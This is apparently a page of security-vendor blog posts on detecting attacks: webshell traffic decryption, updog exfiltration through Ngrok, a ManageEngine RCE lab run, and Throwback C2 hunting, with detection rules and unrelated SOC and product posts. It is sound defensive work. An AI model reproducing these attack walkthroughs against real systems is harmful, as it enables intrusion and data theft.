Step 4 – 5: At this point we can Base64 decode the data. However, the data that we will get from this step is binary in nature, so we will convert to ASCII hex as well, since we need to use part of it for the AES IV.

 

Decryption: Step 4-5

 

Step 6 – 7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of Cyberchef to store these bytes in $R0, and then remove them with the Replace function:

 

Decryption: Step  6-7

 

Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.

 

Decryption: Step 8

 

The actual recipe is shown below:

 

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)

 

We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:

 

Decryption: Part 2

 

The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:

 

Decrypt Response

 

NetWitness Platform - Detection

 

The malicious activity in this incident will be detected at multiple stages by NetWitness Endpoint from the exploit itself, to the webshell activity and subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor any web daemon processes (such as w3wp.exe) for uncommon behavior. Uncommon behavior for such processes primarily falls into three categories:

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).

 

The NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:

 

Webshell detection rules

 

The process tree will also reveal the commands that are executed via the webshell in more detail:

 

Process flow

 

Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account

 

As part of your daily hunting you should always also look at any Fileless_Scripts, which are common when encoded powershell commands are executed:

 

Fileless_Script events

 

From the NetWitness packet perspective such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends that such technology is deployed in your network to provide visibility into this type of traffic, which also makes up a substantial amount of traffic in every network.

 

Once the traffic is decrypted, there are several aspects of this traffic that are grouped in typical hunting paths related to  the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:

 

Service Analysis

 

The webshell commands are found in the Query meta key:

 

Query meta key

 

In order to flag the lowercase request to /ews/exchange.asmx we will need to setup a custom configuration using the SEARCH parser, normally disabled by default. We can do the same with the other lowercase headers, which are the characteristics we observed of whatever client the attacker is using to interact with this webshell. In NWP we can  quickly setup this in the search.ini file of your decoder.  Any hits for this string can then be referenced in AppRules by using this expression (found = 'Lowercase EWS'), and can be combined with other metadata.

 

Search.ini config

 

Conclusion

 

This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can always lead to early detection and reduced attacker dwell time. The NetWitness Platform will provide your team with the necessary visibility to detect and investigate such breaches.

 

Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.

Lee Kirkpatrick

What's updog?

Posted by Lee Kirkpatrick Employee Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set adhoc SSL certificates and use HTTP basic auth. It was created by sc0tfree  and can be found on his GitHub page here. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind from its usage.

 

The Attack

We are starting updog with all the default settings on the attacker machine, this means it will expose the directory we are currently running it from over HTTP on port 9090:

 

In order to quickly make updog publicly accessible over the internet, we will use a service called, Ngrok. This service exposes local servers behind NATs and firewalls to the public internet over secure tunnels - the free version of Ngrok creates a randomised URL and has a lifetime of 8 hours if you have not registered for a free account:

 

This now means that we can access our updog server over the internet using the randomly generated Ngrok URL, and upload a file from the victims machine:

 

The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok. They are commonly utilised in phishing campaigns as the generated URLs are randomised and short lived. With a recent update to the DynDNS parser from William Motley, we now tag many of these services in NetWitness under the Service Analysis meta key with the meta value, tunnel service:

 

 

Pivoting into this meta value, we can see there is some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename with a PNG image named, updog.png:

 

 

Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:

 

 

NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:

 

Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:

 

Appliance

Description

Logic

Fidelity

Packet Decoder

Detects the usage of Updog

server begins 'werkzeug ' && filename = 'updog.png '

High

 

 

Conclusion

As a defender, it is important to monitor traffic to services such as Ngrok as they can pose a significant security risk to your organisation, there are also multiple alternatives to Ngrok and traffic to those should be monitored as well. In order for the new meta value, tunnel service to start tagging these services, make sure to update your DynDNS Lua parser.

Introduction

Security Operation Centre (SOC) comes in different forms (e.g. In-House, Outsourced, Hybrid etc) and sizes, depending on multiple factors such as the objectives and functions that the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs, there will always be a SIEM, which basically acts as the brain of the SOC to pick up anomalies by correlating and performing sense-making on the information coming in from various packet and log sources. More than often, the efficiency of your SOC in being able to detect potential breaches in a timely manner, depends very much on the SIEM itself, which includes from having the correct sizing and configuration, being integrated with the relevant data sources, to having the right Use Cases deployed, among others. In this post, we will be focusing on the strategy to plan and develop Use Cases that will lead to effective monitoring and detection in your SOC.  

 

Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, there will be many Use Cases which may come to mind that would cater to different threat scenarios. Most of the SOCs would typically make use of the Out-Of-The-Box (OOTB) Use Cases that are available as a start, however, this will not be sufficient in the long run. Hence, there is a need to also develop your own Use Cases on top of the OOTB ones. The fact is that Use Case development is a lengthy and on-going process, from identifying the problem statement to finetuning the Use Cases, and also coupled with the fact that the threat landscape is constantly evolving. Therefore, it is always important to be able to prioritise which Use Cases to be developed first and one of the best ways to do so, is to come up with a roadmap. 

 

When it comes to road-mapping for your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK Framework and THE VERIS Framework, which are useful resources to aid you in your roadmap planning, further information can be found in the following URLs - MITRE ATT&CK https://attack.mitre.org/, THE VERIS http://veriscommunity.net/. However, it is important to note that while such frameworks form good references, they should not be taken wholesale when it comes to planning for your organisation’s Use Case development roadmap, reason being all organisations are unique and therefore not all areas are applicable. Prior to planning for the roadmap, it will be worthwhile to first perform a Priority Analysis, where you can identify the priority areas in which the Use Cases should be focused upon, based on factors such as the following:

 

  •      Existing threat profile including top known threats,

 

  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)

 

  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.

 

With the Priority Analysis being performed, you will then be able to identify which are your “Crown Jewels” and prioritise the protection efforts by developing the relevant Use Cases around them.

 

The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:

 

  1.       Define Problem Statement. This highlights the “problem” that you wish to solve (i.e. the threat that you wish to detect) by having the Use Case, and give rises to the objective of the Use Case which you are planning to develop. It is important to note that in planning which Use Case to be developed, the relevancy of a Use Case should not be determined solely based on presence of indicators from the past logs of the environment, because it does not mean that an incident (e.g. breach) that have not happened before will not occur in the future (Refer to the Priority Analysis explained in the previous section for recap on how to identify relevant Use Cases).  

 

  1.       Develop High Level Logic. Once the objective of the Use Case is clear, the next step will be to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters such as the length of the “view” or “window” and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage as this may cloud your thinking and increase the chances of introducing errors into your logic design.

 

  1.       Identify Data Requirements. Identify the packet and/ or log sources that are required as inputs into the Use Case and check their availability in the production environment.

 

  1.      Check Live Resource or Internal Library. Based on the high-level logic developed, always try to look for similar and existing Use Cases that are available in the Live Resource (more information at: https://community.rsa.com/docs/DOC-79978), community platforms or your own internal Use Case library, instead of developing them from scratch, as this would help to potentially minimize the efforts on development and at the same time reduce chances of human errors.

 

  1.     Development. Proceed to develop the Use Case in syntax form by either making modifications from existing references or develop from scratch if there are no other alternatives.

 

  1.     Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario which the Use Case is intended to detect to confirm that the Use Case is functioning correctly, before proceeding to deploy it in the production environment. Note that there is an option in NetWitness to deploy the Use Case as a Trial Rule, more information can be found at: https://community.rsa.com/docs/DOC-78667.

 

  1.       Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.

 

  •  Do note that while False Positives can be determined following triage, it is much more challenging to determine and obtain an accurate picture of the False Negative rate, as this is only possible when you happened to learn of an actual breach and where the relevant Use Case failed to trigger in your environment i.e. you do not know what you do not know. In many instances, breaches could go undetected for a prolonged period of time, hence making False Negative rate an extremely difficult metric to be measured. Therefore, it is important to properly test out the Use Case where possible, following initial deployment.

 

  1.      Finetune. Now, should you stop yourself from deploying a particular Use Case for fear of introducing a potentially high False Positive rate? We all know that high false positive rates are one of the nightmares for an analyst, however, we should not be stopping ourselves from deploying a particular Use Case into the environment simply because of this, reason being the Use Case serves to exist in the first place because of the “problem” that you need to solve (as defined in your Problem Statement). Rather, we should look to deploy, monitor and fine tune the Use Case to reduce the False Positive rate over time. At this point, we have to caution that this is not a one-time process and may require several iterations of review and finetuning over time to eventually stabilise the False Positive rate to an acceptable level.

 

  1.      Regular Review. Again, as the threat landscape evolves constantly, we should look to put in place a process to conduct regular reviews of the existing Use Cases, finetune or even retire them if they are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.

 

Playbook

Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to also ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework which spells out the high-level response process, it is recommended to go into the second order of details to put in place the relevant Playbooks, which are step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the playbooks during the Incident Response cycle depending on the maturity level of the SOC:

 

  1.       Printed Procedures. This is the least mature method to operate the Playbooks and is generally not recommended unless there are no other suitable alternatives.

 

  1.      Shared Spreadsheet. This is suitable for small scaled or newly set-up SOCs which are not ready to invest in a SIRP or SOAR yet. For each new case, the relevant playbook template can be pulled out and populated onto an excel spreadsheet (or equivalent) and have it deposited into a shared drive available to all the SOC members, where analysts could update the incident response actions that they have taken while the SOC Manager, Incident Handler or Analyst Team Lead could track the status of the open cases through these spreadsheets.

 

  1.     SIRP. This is basically an Incident Management Platform which allow the analysts to easily apply the relevant playbooks and update the status of the incidents in a centralised platform. As compared to the spreadsheet method, the SIRP allows for a stricter access control in terms of being able to define and enforce different level of permissions across different roles in the platform, as well as the ability to maintain an audit trail.

 

  1.      SOAR. This Orchestrator provides a greater degree of automation in the incident response as compared to SIRP, which could potentially cut down the response time and increase the overall efficiency of the analysts.

 

Conclusion

To conclude, there is no one-size-fit-all solution when it comes to developing the Use Cases in your organisation and one of the recommended ways is to define a short-to-medium term roadmap customised to your environment for Use Case development. The roadmap should also be reviewed and revised from time-to-time to ensure that it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across different phases in the Cyber Kill Chain as shown below:

 

 

We hope that you find this useful in planning for the Use Cases to be developed in your organisation and happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). The description of how this works in full and the code can be found on his website, https://srcincite.io/advisories/src-2020-0011/. We thought we would have a quick run of this through the lab to see what indicators it leaves behind.

 

The Attack

Here we simply run the script and pass two parameters, the target, and the command - which in this case is using cmd.exe to execute whoami and output the result to a file named si.txt:

 

We can then access the output via a browser and see that the command was executed as SYSTEM:

 

Here we execute ipconfig:

 

And grab the output:

 

The Detection in NetWitness Packets

The script sends a HTTP POST to the ManageEngine server as seen below. It targets the MDMLogUploaderServlet over its default port of 8383 to upload a file with controlled content for the deserialization vulnerability to work, in this instance the file is named logger.zip. The command to be executed can also be seen in the body of the POST:

The traffic by default for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.

 

This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:

 

This activity could be detected by using the following logic in an application rule:

(service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=') || (service = 80) && (action = 'get') && (directory = '/cewolf/')

 

The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as this is what ManageEngine uses. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand if it is normal behaviour or not - from the below we can see java.exe spawning cmd.exe and running reconaissance type commands, such as whoami and ipconfig - this should stand out as odd:

 

The following application rule logic could be used to pick up on this activity. Here we are looking for Java being the source of execution as well as looking for the string "tomcat" to narrow it down to Apache Tomcat web servers that work as the backend for the ManageEngine application, the final part is identifying fileless scripts being executed by it:

(filename.src ='java.exe') && (param.src contains'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other java based web servers will likely show a similar pattern of behavior when being exploited.

 

 

Conclusion

As an analyst it is important to stay up to date with the latest security news to understand if you organisation could potentially be at risk of compromise. Remote execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date and patches applied where available ASAP to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called, Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will delve a little deeper into the threat hunting process for NetWitness as well.

 

The Attack

After installing Throwback and compiling the executable for infection, which in this case, we will just drop and execute manually. We will shortly see the successful connection back to the Throwback server:

 

Now we have our endpoint communicating back with our server, we can execute typical reconaissance type commands against it, such as whoami:

 

Or tasklist to get a list of running processes:

 

This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:

 

 

Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what it is they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove, or disprove them; for this post, our hypothesis is going to be that there is C2 traffic - these can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.

 

Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. Based on what we are looking for defines the direction. So in this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
  2. Secondly, you want to focus on a single protocol at a time. So for our hypothesis, we could start with SSL, if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one to separate the data into smaller more manageable buckets without getting distracted (service = 80)
  3. Now we want to hone in on the characteristics of the protocol, and pull it apart. As we are looking for C2 communication, we would want to pull apart the protocol to look for more mechanical type behaviour - one meta key that helps with this is Service Analysis - the below figure shows some examples of meta values created based off HTTP

 

A great place to get more detail on using NetWitness for hunting can be found in the RSA NetWitness Hunting Guide: RSA NetWitness Hunting Guide PDF.

 

From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting on, you can choose to pivot on an individual meta value, or multiple. We are going to start by pivoting on three, which are outlined below:

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere

 

After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:

 

Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLDSLD, etc. Based off the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:

 

Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes, the filename is the same everytime, and the payload size is consistent apart from the initial communication which could be a download of a second stage module to further entrench - this could also be legitimate traffic and software simply checking in for updates, sending some usage data, etc.:

 

Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we had the executable, keep reading on to see!

 

Similarly we see another session which is the same but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.

 

NOTE: The network traffic as seen here would be post proxy, or traffic in a network with no explicit proxy settings (https://www.educba.com/types-of-proxy-servers/).

 

Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:

 

Opening the Events view for this meta value, we can see that an executable named, dwmss.exe, is making a network connection to de11-rs4[.]com:

 

Coming back to the investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query, filename.src = 'dwmss.exe' - here we can see the executable is running reconaissance type commands:

 

From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:

 

There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:

 

RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:

 

Navigating back to the packets and copying some of the Base64 from one of the POST's, we can run it through the RC4 recipe on CyberChef with our proposed key; in the output we can see the data decoded successfully and contains information about the infected endpoint:

 

Now we have confirmed this is malware, we should go back and look at all the activity generated by this process. This could be any file that it has created, files dropped around the same time, folders it may be using, etc.

 

Conclusion

C2 frameworks are constantly being developed and improved upon, but as you can see from this C2 which is ~6 years old, their operation is fairly consistent with what we see today, and with the way NetWitness allows you to pull apart the characteristics of the protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows to run queries directly from the address bar.

 

 

The following are the steps to follow in your browser to set this up.

 

  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."

 

 

 

  1. Click on "Add" to add a new search engine
  2. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing "keyword" followed by the <tab> key)
    • URL: this should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s
  3. Click on "Add" to add NetWitness as a Search Engine

 

 

Now, whenever you click on the address bar, type nw followed by the <tab> key (or whatever keyword you have chosen in the previous step), you can directly type your NetWitness query in the address bar and hit <enter> to run the query on NetWitness.

 

 

 

We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!

 

The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.

 

The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 

 

Download the report and learn more about RSA NetWitness Platform.

_________________________________________________________________________________________________ 

Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

 

As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018

 

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.

 

The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.

 

Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?

 

After all, my lab environment is a fraction the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of the these keys then its downright laughable to expect any organization to even attempt to do the same.

 

Enter....automation and scripting to the rescue!

superhero entrance

 

The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.

 

But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it....without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result...because otherwise what's the point?

 

I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.

 

The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued.
  5. Store the result of #3 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been process.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).

 

This is best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.

 

The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:

 

 

 

 

Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.

Filter Blog

By date: By tag: